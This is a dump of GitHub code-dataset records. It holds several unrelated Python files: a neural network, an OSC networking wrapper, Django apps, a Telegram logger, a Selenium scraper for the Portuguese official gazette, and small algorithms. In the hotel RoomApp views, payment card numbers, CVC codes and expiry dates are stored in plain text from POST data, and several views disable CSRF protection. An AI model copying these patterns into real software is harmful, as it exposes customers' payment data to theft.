opr_a_arr, opr_b_arr, op_arr)\n\n # step5: log results\n log(num_test_cases, opr_a_arr, opr_b_arr, op_arr, dut_result, expected_result)\n ","repo_name":"hamza-akhtar-dev/pak-rv-core","sub_path":"sub/components/verif/pytests/test_alu.py","file_name":"test_alu.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"39733597655","text":"import datetime\n\nimport aiohttp\n\nfrom app.config import config\n\n\nclass TelegramLoggerService:\n def __init__(self):\n self.bot_token = config.TELEGRAM_BOT_TOKEN # type: str\n self.chat_id = config.TELEGRAM_CHAT_ID # type: int\n\n async def _send_message(self, message: str) -> str:\n data = {\n \"chat_id\": self.chat_id,\n \"text\": message,\n \"parse_mode\": \"HTML\",\n \"disable_web_page_preview\": True,\n }\n url = f\"https://api.telegram.org/bot{self.bot_token}/sendMessage\"\n\n async with aiohttp.ClientSession() as session:\n async with session.post(url, data=data) as resp:\n return await resp.text()\n\n async def send_answer(\n self, user_id: int, answer: str, time: datetime.datetime\n ) -> str:\n message = f\"{time}: Пользователь {user_id} отправил ответ {answer}\"\n return await self._send_message(message)\n\n async def 
send_solve(\n self, user_id: int, time: datetime.datetime, task_number: int\n ) -> str:\n message = f\"{time}: Пользователь {user_id} решил задачу {task_number}\"\n if task_number == 10:\n message = f\"{time}: Пользователь {user_id} решил задачу {task_number}\\n\"\n message += f\"{time}: Пользователь {user_id} решил задачу последнюю задачу. Поздравляем!\\n\\n\"\n message += f\"@DragonProd @i_am_oniel @annaseliw\"\n return await self._send_message(message)\n","repo_name":"mirea-ninja/online-quest-backend","sub_path":"app/internal/service/telegram_logger.py","file_name":"telegram_logger.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21076567349","text":"# coding:utf-8\nimport math\nimport numpy as np\nfrom sigmoid import Sigmoid\n\nW0_NUM = 50 # 第一层神经元个数\nW1_NUM = 30 # 第二层神经元个数\nOUT_NUM = 10 # 输出层神经元个数\nIMG_COUNT = 60000 # 训练样本集的数量\nEPOCH = 500 # 训练样本集的次数\nBATCH_SIZE = 100 # 一次训练的样本个数\nITERATION = int(IMG_COUNT / BATCH_SIZE) # 一个样本集迭代的次数\n\n\nclass Bp():\n def __init__(self, eta=0.0001, set=None, set_label=None):\n self.__eta = eta\n self.__set = np.insert(set, 0, values=1, axis=1)\n self.__set_label = set_label\n col = self.__set.shape[1]\n self.__w0 = np.random.normal(loc=0, scale=1 / math.sqrt(col), size=(W0_NUM, col))\n self.__w1 = np.random.normal(loc=0, scale=1 / math.sqrt(W0_NUM), size=(W1_NUM, W0_NUM + 1))\n self.__w2 = np.random.normal(loc=0, scale=1 / math.sqrt(W1_NUM), size=(OUT_NUM, W1_NUM + 1))\n\n def iteration(self):\n for x in range(EPOCH):\n for i in range(ITERATION):\n var_w2 = 0\n var_w1 = 0\n var_w0 = 0\n for b in range(BATCH_SIZE):\n x_in = self.__set[i * BATCH_SIZE + b].reshape(785, 1)\n v0, y0 = self.calculate(w=self.__w0, x=x_in)\n y0_add_offset = np.insert(y0, 0, values=1, axis=0)\n v1, y1 = self.calculate(w=self.__w1, x=y0_add_offset)\n y1_add_offset = np.insert(y1, 0, values=1, axis=0)\n v2, y2 = self.calculate(w=self.__w2, x=y1_add_offset)\n d = np.zeros((10, 1)) - 1\n d_index = int(self.__set_label[i * BATCH_SIZE + b])\n d[d_index] = 1\n delta_w2 = self.calculate_delta(d, y2)\n var_w2 = var_w2 + self.update_output(\n self.__w2, delta_w2, y1_add_offset)\n delta_w1 = self.calculate_sum_delta(delta_w2, self.__w2)\n var_w1 = var_w1 + self.update_hiding(\n self.__w1, delta_w1, y0_add_offset, y1)\n delta_w0 = self.calculate_sum_delta(\n np.delete(delta_w1, 0, axis=0), self.__w1)\n var_w0 = var_w0 + self.update_hiding(\n self.__w0, delta_w0, x_in, y0)\n self.__w2 = self.__w2 + (1 / BATCH_SIZE) * self.__eta * var_w2\n self.__w1 = self.__w1 + (1 / BATCH_SIZE) * self.__eta * var_w1\n self.__w0 = self.__w0 + (1 / BATCH_SIZE) * self.__eta * var_w0\n return self.__w0, self.__w1, self.__w2\n\n def calculate(self, w=None, x=None):\n v = w.dot(x)\n y = Sigmoid.tanh(a=1, b=1, x=v)\n return v, y\n\n def calculate_delta(self, d, y):\n return (d - y) * Sigmoid.derivative_tanh(a=1, b=1, x=y)\n\n def calculate_sum_delta(self, delta, w):\n return (w.T).dot(delta)\n\n def update_output(self, w, delta, x):\n # print((self.__eta*delta.dot(x.T)).shape)\n return delta.dot(x.T)\n\n def update_hiding(self, w, sum_delta, x, y):\n return (Sigmoid.derivative_tanh(a=1, b=1, x=y)\n * np.delete(sum_delta, 0, axis=0)).dot(x.T)\n","repo_name":"lmlyiwai/bp","sub_path":"src/bp.py","file_name":"bp.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10964254704","text":"import math, logging\n\n# 
for documentation on the PyQt5 API, see http://pyqt.sourceforge.net/Docs/PyQt5/index.html\nfrom PyQt5 import QtCore, QtNetwork\n\n# This uses python-osc to decode UDP packets containing OSC messages.\n# installation: pip3 install python-osc\n# source code: https://github.com/attwad/python-osc\n# pypi description: https://pypi.org/project/python-osc/\nimport pythonosc.dispatcher\nimport pythonosc.udp_client\n\n# set up logger for module\nlog = logging.getLogger('osc')\n\n# filter out most logging; the default is NOTSET which passes along everything\n# log.setLevel(logging.WARNING)\n\n################################################################\nclass QtOSCListener(QtCore.QObject):\n \"\"\"Object to manage a OSC network input. This uses a Qt QUdpSocket to receive\n messages from the main Qt event loop and a pythonosc dispatcher to decode\n OSC messages and distribute them to callbacks. Messages are delivered on\n the main thread. This requires a pythonosc version of at least 1.7.0 so the\n dispatcher can be used in this way.\n\n :param port: optional UDP port number to which to receive, defaults to 3761\n :param host: optional hostname or IP address to which to receive, defaults to localhost\n\n \"\"\"\n\n def __init__(self, port=3762, host='localhost'):\n super(QtOSCListener,self).__init__()\n\n # global state\n self.listener_address = \"localhost\"\n self.listener_portnum = 3761\n self.port = None\n\n # Initialize the OSC message dispatch system.\n self.dispatcher = pythonosc.dispatcher.Dispatcher()\n self.dispatcher.set_default_handler(self.unknown_message)\n return\n\n def map_handler(self, address, callback):\n \"\"\"Add an address template string to the dispatch map.\"\"\"\n self.dispatcher.map(address, callback)\n return\n\n def set_OSC_port(self, address, portnum):\n \"\"\"Called to configure a new network address. If the port is already open it is\n closed and a new port opened with the new address.\"\"\"\n self.listener_address = address\n self.listener_portnum = portnum\n if self.port is not None:\n self.open_receiver()\n return\n\n def open_receiver(self):\n \"\"\"Create a UDP socket, bind it to the desired port, and set up callbacks to\n process messages upon receipt. This may be called again after the port\n address has changed and will create a new socket.\n \"\"\"\n\n # create a UDP socket to send and receive messages from the client\n if self.port is not None:\n self.port.close()\n\n self.port = QtNetwork.QUdpSocket()\n success = self.port.bind(QtNetwork.QHostAddress(self.listener_address), self.listener_portnum)\n if not success:\n log.warning(\"Failed to bind listener socket.\")\n self.port.close()\n self.port = None\n else:\n self.port.readyRead.connect(self.message_received)\n log.info(\"OSC receiver ready to go, listening for OSC UDP packets on %s:%d\" % (self.listener_address, self.listener_portnum))\n return\n\n def message_received(self):\n \"\"\"Callback attached to the port readyRead signal to process incoming UDP packets.\"\"\"\n # the host is an instance of QHostAddress\n msg, host, port = self.port.readDatagram(20000)\n self.dispatcher.call_handlers_for_packet(msg, host)\n return\n\n def unknown_message(self, msgaddr, *args):\n \"\"\"Default handler for unrecognized OSC messages.\"\"\"\n log.debug(\"Unhandled OSC message: %s %s\" % (msgaddr, \" \".join([str(arg) for arg in args])))\n return\n\n################################################################\nclass QtOSCSender(QtCore.QObject):\n \"\"\"Object to manage a OSC network output. 
This is a thin wrapper around the\n pythonosc SimpleUDPClient to allow this object to close and reopen the port\n at will while retaining its identity in the application.\n\n :param port: optional UDP port number to which to send, defaults to 3762\n :param host: optional hostname or IP address to which to send, defaults to localhost\n \"\"\"\n\n def __init__(self, port=3762, host='localhost'):\n super(QtOSCSender,self).__init__()\n\n # global state\n self.destination_address = host\n self.destination_portnum = port\n self._port = None\n return\n\n def set_OSC_port(self, address, portnum):\n \"\"\"Called to configure a new destination network address. If the port is already open it is\n closed and a new port opened with the new address.\"\"\"\n self.destination_address = address\n self.destination_portnum = portnum\n if self._port is not None:\n self.open_sender()\n return\n\n def open_sender(self):\n \"\"\"Create a UDP client with the chosen destination address. This may be called\n again after the port address has changed and will create a new socket.\n \"\"\"\n # create a new UDP socket to send messages to a server\n self._port = pythonosc.udp_client.SimpleUDPClient(self.destination_address, self.destination_portnum)\n log.info(\"OSC sender ready to go, configured for OSC UDP packets to %s:%d\" % (self.destination_address, self.destination_portnum))\n return\n\n def send(self, address, *args):\n \"\"\"Send a UDP packet containing a single OSC message to the predesignated host address and UDP port number.\n\n :param address: an OSC 'address' string beginning with a forward slash\n :param args: optional arguments, which must be primitive types convertible to OSC message data types\n \"\"\"\n\n if self._port is not None:\n self._port.send_message(address, args)\n\n################################################################\n","repo_name":"Toms42/Disruption-ROS","sub_path":"src/robots/rcp/osc.py","file_name":"osc.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22878654837","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom .models import *\nfrom django.shortcuts import get_object_or_404\nfrom django.template.response import TemplateResponse\nfrom mezzanine.generic.models import Keyword\nfrom calendar import month_name\nfrom django.http import Http404\nfrom django.contrib.auth import get_user_model\nfrom mezzanine.utils.views import paginate\nfrom mezzanine.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nUser = get_user_model()\n\n\ndef index(request, tag=None, year=None, month=None, username=None,\n category=None, template=\"frontend/index.html\",\n extra_context=None):\n \"\"\"\n Display a list of blog posts that are filtered by tag, year, month,\n author or category. 
Custom templates are checked for using the name\n ``frontend/book_list_XXX.html`` where ``XXX`` is either the\n category slug or author's username if given.\n \"\"\"\n templates = []\n blog_posts = Book.objects.published(for_user=request.user).order_by('?')[:12]\n # blog_posts = Book.objects.published().order_by('?')[:12]\n if tag is not None:\n tag = get_object_or_404(Keyword, slug=tag)\n blog_posts = blog_posts.filter(keywords__keyword=tag)\n if year is not None:\n blog_posts = blog_posts.filter(publish_date__year=year)\n if month is not None:\n blog_posts = blog_posts.filter(publish_date__month=month)\n try:\n month = _(month_name[int(month)])\n except IndexError:\n raise Http404()\n if category is not None:\n category = get_object_or_404(BookCategory, slug=category)\n blog_posts = blog_posts.filter(categories=category)\n templates.append(u\"frontend/book_list_%s.html\" %\n str(category.slug))\n author = None\n if username is not None:\n author = get_object_or_404(User, username=username)\n blog_posts = blog_posts.filter(user=author)\n templates.append(u\"frontend/book_list_%s.html\" % username)\n\n prefetch = (\"categories\", \"keywords__keyword\")\n blog_posts = blog_posts.select_related(\"user\").prefetch_related(*prefetch)\n blog_posts = paginate(blog_posts, request.GET.get(\"page\", 1),\n settings.BLOG_POST_PER_PAGE,\n settings.MAX_PAGING_LINKS)\n context = {\"blog_posts\": blog_posts, \"year\": year, \"month\": month,\n \"tag\": tag, \"category\": category, \"author\": author}\n context.update(extra_context or {})\n templates.append(template)\n return TemplateResponse(request, templates, context)\n","repo_name":"back1992/fireaws","sub_path":"web/frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69907181492","text":"from flask_app import app\nfrom flask import render_template, request, redirect\nfrom flask_app.models.dojo import Dojo\n\n@app.route('/dojos') \ndef dojos():\n dojos = Dojo.get_all() \n \n return render_template(\"dojos.html\", dojos = dojos)\n\n@app.route('/dojos/<int:dojoid>')\ndef dojo(dojoid):\n data = {\n \"id\":dojoid\n }\n dojo_from_database = Dojo.get_dojo_with_ninjas(data)\n \n return render_template(\"dojo.html\", dojo=dojo_from_database)\n\n@app.route('/dojos/create', methods=[\"POST\"])\ndef createdojo():\n data = {\n \"name\": request.form[\"dojo_name\"]\n }\n Dojo.create_dojo(data)\n return redirect('/dojos')","repo_name":"TheTechieYeti/Python","sub_path":"flask_mysql/crud/dojos_ninjas/flask_app/controllers/dojos.py","file_name":"dojos.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71615748854","text":"from itertools import product\ndef floyd_warshall(n, edge):\n\n rn = range(n)\n dist = [ [float('inf')] * n for i in rn]\n\n for i in rn:\n dist[i][i] = 0\n \n for src, dest, distance in edge:\n dist[src-1][dest-1] = distance\n \n # relax every pair (i, j) through intermediate vertex k; product() keeps k in the outermost position\n for k, i, j in product(rn, repeat=3):\n new_dist = dist[i][k] + dist[k][j]\n if new_dist < dist[i][j]:\n dist[i][j] = new_dist\n\n return dist\n\n\ngrafo = [[1,2,1], [1,3,5], [1,4,6], [2,1,1], [2,3,1], [3,1,5], [3,2,1], [3,4,1], [4,1,6], [4,3,1]]\nprint(floyd_warshall(4, 
grafo))\n","repo_name":"fernandozanutto/competitive_programming","sub_path":"algorithms/grafos/floyd_warshall.py","file_name":"floyd_warshall.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"1825445066","text":"# Write a python program to find the sum of the first n positive integers.\n\ndef find_sum_integers(numbers):\n temp = 0\n for num in numbers:\n if(num>0):\n temp = temp + num\n else:\n break\n return temp\n\nprint(find_sum_integers([2,3,4,5,-1,2,3,4,5]))\nprint(find_sum_integers([2,3,4,5,1,2,3,4,5]))\n\n# w3source's answer\nn = 8\nsum_num = (n * (n + 1)) / 2\nprint(sum_num)","repo_name":"hasanyucel/PythonProjects","sub_path":"Applications/Basics/Basic-058.py","file_name":"Basic-058.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7866873201","text":"import functools\nimport json\nimport os\nimport shlex\n\nimport toml\nimport yaml\n\n# while we want to keep this minimal, the common class contains some useful functions usable by many providers.\n\nclass Singleton(type):\n _instances = {}\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\ndef memoize(func):\n \"\"\"\n The second time the decorated function is called, return the previous response value\n versus calling the function.\n \"\"\"\n cache = func.cache = {}\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n return memoized_func\n\ndef shlex_kv(msg):\n data = shlex.split(msg)\n results = dict()\n for item in data:\n if '=' in item:\n (k,v) = item.split(\"=\",1)\n results[k] = v\n else:\n raise Exception(\"invalid input: %s\" % data)\n return results\n\ndef load_data_file(path):\n path = os.path.abspath(os.path.expanduser(os.path.expandvars(path)))\n if not os.path.exists(path):\n raise Exception(\"path does not exist: %s\" % path)\n if path.endswith(\".toml\"):\n return toml.load(path)\n elif path.endswith(\".json\"):\n fd = open(path)\n return json.loads(fd.read())\n elif path.endswith(\".yaml\"):\n fd = open(path)\n data = yaml.safe_load(fd.read())\n return data\n else:\n raise Exception(\"unknown extension: %s\" % path)\n","repo_name":"opsmop/opsmop","sub_path":"opsmop/core/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":708,"dataset":"github-code","pt":"21"} +{"seq_id":"29684088441","text":"BOT_NAME = 'brsspa'\n\nSPIDER_MODULES = ['brsspa.spiders']\nNEWSPIDER_MODULE = 'brsspa.spiders'\nFEED_EXPORT_ENCODING = 'utf-8'\nLOG_LEVEL = 'ERROR'\nDOWNLOAD_DELAY = 0\n\nROBOTSTXT_OBEY = True\n\nITEM_PIPELINES = {\n\t'brsspa.pipelines.BrsspaPipeline': 100,\n\n}","repo_name":"hristo-grudev/brsspa","sub_path":"brsspa/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16120546315","text":"from django.shortcuts import render, HttpResponse, redirect, get_object_or_404\nfrom django.views.generic import ListView, FormView, View, DeleteView\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils import timezone\nfrom datetime import datetime\nimport 
json\nfrom django.http import JsonResponse, HttpResponse\nfrom django.forms.models import model_to_dict\n\nfrom .models import Room, Booking, Bill\nfrom .forms import AvailabilityForm\nfrom RoomApp.booking_functions.available import check_availability\nfrom django.views.decorators.csrf import csrf_exempt\nfrom UserApp.models import Guest\nfrom django.db.models import Q\n\nimport os\n\n# from sendgrid import SendGridAPIClient\n# from sendgrid.helpers.mail import Mail\n# Create your views here.\ndef main(request):\n\n return render(request, \"reserve_main.html\", {})\n\n\ndef get_reserve_context(category, check_in, check_out):\n period = int(check_out.replace(\"-\", \"\")) - int(check_in.replace(\"-\", \"\"))\n price = 0\n room_price = 0\n tax = 0\n category_name = \"\"\n if category == \"STD\":\n room_price = 200000\n category_name = \"스탠다드룸\"\n elif category == \"SUP\":\n room_price = 280000\n category_name = \"슈페리어룸\"\n elif category == \"DEL\":\n category_name = \"디럭스룸\"\n room_price = 375000\n elif category == \"EXC\":\n category_name = \"이그제큐티브룸\"\n room_price = 450000\n elif category == \"STE\":\n category_name = \"스위트룸\"\n room_price = 500000\n price = room_price * period\n tax = int(price / 10)\n context = {\n \"category_name\": category_name,\n \"room_price\": room_price,\n \"price\": (price + tax),\n \"tax\": tax,\n \"period\": period,\n }\n return context\n\n\ndef get_category_by_room_ID(roomID):\n if roomID[0] == \"2\":\n return \"STD\"\n elif roomID[0] == \"3\":\n return \"SUP\"\n elif roomID[0] == \"4\":\n return \"DEL\"\n elif roomID[0] == \"5\":\n return \"EXC\"\n elif roomID[0] == \"6\":\n return \"STE\"\n\n\n@csrf_exempt\ndef reserve_complete(request):\n booking_room_id = request.session.get(\"num\")[:3]\n category = get_category_by_room_ID(str(booking_room_id))\n print(category)\n check_in = request.session.get(\"check_in\")[0]\n check_out = request.session.get(\"check_out\")[0]\n find_room_num = Room.objects.filter(room_id=booking_room_id)[0]\n ex = request.POST.get(\"card_experiment\")\n experiment = ex.replace(\"/\", \"\")\n num = request.POST.get(\"card_password\")\n num_save = num.replace(\"-\", \"\")\n Bill.objects.get_or_create(\n bill_room=find_room_num,\n card_password=num_save,\n card_cvc_num=request.POST.get(\"card_cvc_num\", \"\"),\n card_experiment=experiment,\n )\n booking_user_id = request.session.get(\"user\")\n booking = Booking.objects.get_or_create(\n booking_roomid=Room.objects.get(room_id=booking_room_id),\n booking_userid=Guest.objects.get(site_id=booking_user_id),\n check_in=check_in,\n check_out=check_out,\n )\n context = get_reserve_context(category, check_in, check_out)\n context[\"check_in\"] = check_in\n context[\"check_out\"] = check_out\n context[\"reserve_id\"] = booking[0].id\n return render(request, \"reserve_complete.html\", context)\n\n\n@csrf_exempt\ndef checkIn(request):\n json_data = json.loads(request.body)\n room = Room.objects.get(room_id=json_data[\"room_id\"])\n room.on_use = True\n room.save()\n room = model_to_dict(room)\n return JsonResponse({\"room\": room}, status=201)\n\n\ndef getBookingInfo(request):\n json_data = json.loads(request.body)\n date = json_data[\"date\"]\n room = Room.objects.get(room_id=json_data[\"room_id\"])\n booking = Booking.objects.get(\n booking_roomid=room.id, check_in__lte=date, check_out__gte=date\n )\n user = Guest.objects.get(pk=booking.booking_userid_id)\n booking = model_to_dict(booking)\n user = model_to_dict(user)\n return JsonResponse({\"booking\": booking, \"user\": user}, 
status=201)\n\n\n@csrf_exempt\ndef liveReservationStatusView(request):\n rooms = Room.objects.all().values()\n date = request.POST.get(\"Date\", timezone.now())\n if isinstance(date, str):\n date = datetime.strptime(date, \"%Y-%m-%d\")\n date = timezone.make_aware(date)\n for room in rooms:\n checked_in = Booking.objects.filter(\n booking_roomid=room[\"id\"], check_in__lte=date, check_out__gte=date\n )\n room[\"checked_in\"] = len(checked_in) != 0\n room[\"is_using\"] = len(checked_in) != 0 and room[\"on_use\"]\n return render(\n request,\n \"live_reservation_status.html\",\n {\"selected_date\": str(date), \"rooms\": rooms},\n )\n\n\ndef RoomListView(request):\n rooms = Room.objects.all()[:]\n bookings = Booking.objects.all()[:]\n\n check_in = (request.POST[\"check_in\"],)\n check_out = (request.POST[\"check_out\"],)\n request.session[\"check_in\"] = check_in\n request.session[\"check_out\"] = check_out\n\n check_in_date = int(request.POST[\"check_in\"].replace(\"-\", \"\"))\n check_out_date = int(request.POST[\"check_out\"].replace(\"-\", \"\"))\n room_categories = dict(Room.room_type)\n room_list = []\n for room_category in room_categories:\n room = room_categories.get(room_category)\n room_url = reverse(\n \"roomapp:Reserve\",\n kwargs={\n \"category\": room_category,\n },\n )\n\n room_list.append((room, room_url))\n context = {\"room_list\": room_list, \"check_in\": check_in, \"check_out\": check_out}\n\n return render(\n request,\n \"reserve_list.html\",\n {\n \"check_in\": check_in,\n \"check_out\": check_out,\n \"room_list\": room_list,\n \"bookings\": bookings,\n \"context\": context,\n },\n )\n\n\n@csrf_exempt\ndef Reserve(request, category):\n print(category)\n check_in = request.session.get(\"check_in\")[0]\n check_out = request.session.get(\"check_out\")[0]\n if (check_in[0] == check_in[-1]) and check_in.startswith((\"'\", '\"')):\n check_in = check_in[1:-1]\n if (check_out[0] == check_out[-1]) and check_out.startswith((\"'\", '\"')):\n check_out = check_out[1:-1]\n # print(check_in, check_out)\n # check_in_date = str(int(check_in.replace(\"-\", \"\")) - 1)\n # check_out_date = str(int(check_out.replace(\"-\", \"\")) + 1)\n # check_in_in = check_in_date[:4] + \"-\" + check_in_date[4:6] + \"-\" + check_in_date[6:]\n # check_out_out = (\n # check_out_date[:4] + \"-\" + check_out_date[4:6] + \"-\" + check_out_date[6:]\n # )\n # print(check_in_in)\n\n booking_room = list(Room.objects.filter(category=category).values(\"room_id\"))\n print(booking_room)\n index = 0\n # for i in range(len(booking_room)):\n # room_num = list(booking_room[i].values())[0]\n # if Booking.objects.filter(\n # (Q(booking_roomid=room_num) & Q(check_in__range=[check_in, check_out]))\n # | (Q(booking_roomid=room_num) & Q(check_out__range=[check_in, check_out]))\n # ).exists():\n # index += 1\n # print(\"roooooom\", room_num, check_in, check_out)\n # else:\n # print(\"안됐다^^\", \"index=\", index)\n # break\n booking_room_id = Room.objects.filter(category=category)[index]\n booking_room_num = str(booking_room_id)\n request.session[\"num\"] = booking_room_num\n print(\"qpqpqpqpqpqpqp\", request.session[\"num\"])\n # booking_room_room = booking_room_id.values\n return render(\n request, \"reserve.html\", get_reserve_context(category, check_in, check_out)\n )\n\n\nclass BookingListView(ListView):\n model = Booking\n template_name = \"booking_list_view.html\"\n\n def get_queryset(self, *args, **kwargs):\n if self.request.user.is_staff:\n booking_list = Booking.objects.all()\n return booking_list\n else:\n booking_list 
= Booking.objects.filter(user=self.request.user)\n return booking_list\n\n\nclass CancelBookingView(DeleteView):\n model = Booking\n template_name = \"booking_cancel_view.html\"\n success_url = reverse_lazy(\"hotel:BookingListView\")\n","repo_name":"HyeseonLee/hotel-db-system","sub_path":"hotel-db-system/RoomApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23133903642","text":"# -*- coding:utf-8 -*-\n# @Author : Cheng\n# @Time : 2022/5/16 17:13\nfrom typing import List\n\n\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> bool:\n dp = [False for _ in range(len(s) + 1)]\n dp[0] = True\n for i in range(1, len(s) + 1):\n for word in wordDict:\n dp[i] = dp[i] or (dp[i - len(word)] and s[i - len(word):i] == word)\n return dp[-1]\n\n\nif __name__ == '__main__':\n s = \"applepenapple\"\n wordDict = [\"apple\", \"pen\"]\n solution = Solution()\n print(solution.wordBreak(s, wordDict))\n","repo_name":"chengcct/Algorithmic-exercises","sub_path":"leetcode/139. 单词拆分.py","file_name":"139. 单词拆分.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9034959880","text":"import math\nfrom time import sleep\n\nimport typer\nfrom rich import print\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom app.utils import create_pdf_name\n\n\ndef extract_data_from_search_page(date_start: str, date_end: str) -> dict:\n \"\"\"Extract data from search page of the site diariodarepublica.pt\n for file.csv\n param date_start: initial date search.\n param date_end: end date search.\n - `format date = \"AAAA-MM-DD\"`\n \"\"\"\n\n print(f\"Search range | {date_start} | {date_end} |\")\n\n # Dict model data\n data = {\n \"search_range\": [], # search range\n \"description\": [], # description\n \"link_page\": [], # link page 'despacho'\n \"link_pdf\": [], # link page file download\n \"name_pdf\": [], # name pdf file\n \"published\": [], # published date\n }\n\n # Config webdriver\n options = webdriver.FirefoxOptions()\n # options.add_argument('--headless')\n\n # Instance\n browser = webdriver.Firefox(options=options)\n\n # Get initial\n url = \"https://diariodarepublica.pt/dr/home\"\n browser.get(url)\n\n print(f\"Digging up information from '{url}'\")\n\n sleep(3)\n\n # Search\n text_for_research = \"\"\"Concede o estatuto de igualdade de direitos\n e deveres a vários cidadãos brasileiros\n \"\"\"\n\n input_place = browser.find_element(\n By.TAG_NAME, \"input\"\n ) # Find the search box\n input_place.send_keys(f'\"{text_for_research}\"') # Insert text\n\n buttom_search = browser.find_element(\n By.ID, \"b2-b2-myButton2\"\n ) # Find the buttom submit\n buttom_search.click() # Submit\n\n sleep(3)\n\n # Search filter\n checkbox_legislacao = browser.find_elements(\n By.CLASS_NAME, \"checkbox\"\n ) # Find the checkbox 'Legislação'\n checkbox_legislacao[1].click() # Check\n\n sleep(3)\n\n checkbox_serie_plus = browser.find_element(\n By.XPATH, \"//*[@id='Serie_Titulo']/div[1]/span\"\n ) # Find area to expand option 'Série'\n checkbox_serie_plus.click()\n\n sleep(2)\n\n checkbox_serie = browser.find_elements(\n By.CLASS_NAME, \"checkbox\"\n ) # Find the checkbox 'Série II'\n if len(checkbox_serie) == 4:\n checkbox_serie[3].click() # Check\n else:\n checkbox_serie[4].click() # Check\n\n sleep(2)\n\n # Filter date start\n date_published = 
browser.find_element(\n By.ID, \"Input_dataPublicacaoDe\"\n ) # Find box filter date\n date_published.send_keys(date_start) # Insert date fmt AAAA-MM-DD\n exit_calendar = browser.find_element(\n By.XPATH, \"//*[@id='FiltrarResultados']/div[1]/span\"\n )\n exit_calendar.click()\n\n # Filter date end\n date_published = browser.find_element(\n By.ID, \"Input_DataPublicacaoAte\"\n ) # Find box filter date\n date_published.send_keys(date_end) # Insert date fmt AAAA-MM-DD\n exit_calendar.click()\n date_published_submit = browser.find_element(\n By.XPATH, \"//*[@id='Pesquisa2']/div[3]/button/span\"\n )\n date_published_submit.click()\n\n sleep(2)\n\n # Check length pages\n\n length_search = browser.find_elements(By.CLASS_NAME, \"OSFillParent\")\n\n length_search_number = (\n length_search[13] if len(length_search) > 13 else length_search[10]\n )\n length_search_number = length_search_number.text.split(\" \")[0]\n length_search_number = int(length_search_number)\n\n # Check result search\n if length_search_number == 0:\n print(\"[bold red]No information found for scraping![/bold red]\")\n browser.quit()\n return data\n\n total_pages = math.ceil(length_search_number / 25)\n\n # Expand results 200 [disabled]\n # if length_search_number > 25:\n # print(\"expandir lista\")\n # expand_list = browser.find_element(\n # By.XPATH,\n # \"//*[@id='ResultadosEncontrados']/div[2]/div[2]/div/div/span\",\n # )\n # expand_list.click()\n # select_200_items = browser.find_element(\n # By.XPATH,\n # \"//*[@id='transitionContainer']/div/div[2]/div/div/div[3]/a/span\",\n # )\n # select_200_items.click()\n # sleep(2)\n\n # Data extraction\n\n # Navigate between the pages\n i = total_pages # initial countdown\n x = 0 # initial count get items\n p = 0 # initial count pages in for\n\n print(f\"Found {length_search_number} items in {total_pages} pages.\")\n\n for page in range(total_pages):\n body_results = browser.find_element(\n By.ID, \"ListaResultados\"\n ) # Find data\n list_href_page = body_results.find_elements(\n By.CLASS_NAME, \"title\"\n ) # Find element in data (create list)\n\n p += 1\n\n # Collects links from the current page\n print(\n f\"\"\"Digging data (description - link page - name pdf)\n in page {p}/{total_pages}\n \"\"\"\n )\n with typer.progressbar(\n list_href_page, label=\"Collecting \"\n ) as list_href_page:\n for item_href in list_href_page:\n link_page = item_href.get_attribute(\n \"href\"\n ) # Link for page 'despacho'\n text_page = item_href.find_element(\n By.CSS_SELECTOR, \"span\"\n ).text # Extraction text 'despacho'\n name_pdf = create_pdf_name(text_page)\n\n data[\"search_range\"].append(f\"[{date_start}]-[{date_end}]\")\n data[\"description\"].append(text_page)\n data[\"link_page\"].append(link_page)\n data[\"name_pdf\"].append(name_pdf)\n\n length = len(text_page)\n index_start = length - 10\n data[\"published\"].append(text_page[index_start:])\n\n x += 1\n\n print(f\"\\nCollected {x} items\")\n\n i -= 1 # countdown\n\n # next page\n if total_pages > 1 and i != 0:\n next_page = browser.find_element(By.ID, \"b27-Next\")\n next_page.click()\n sleep(2)\n\n # Extract link PDF\n total = length_search_number\n print(\"Digging data (link pdf)\")\n with typer.progressbar(data[\"link_page\"], label=\"Collecting \") as progress:\n for link in progress:\n # Get link page 'despacho'\n browser.get(f\"{link}\")\n\n sleep(2)\n\n list_elements_page_download = browser.find_elements(\n By.CLASS_NAME, 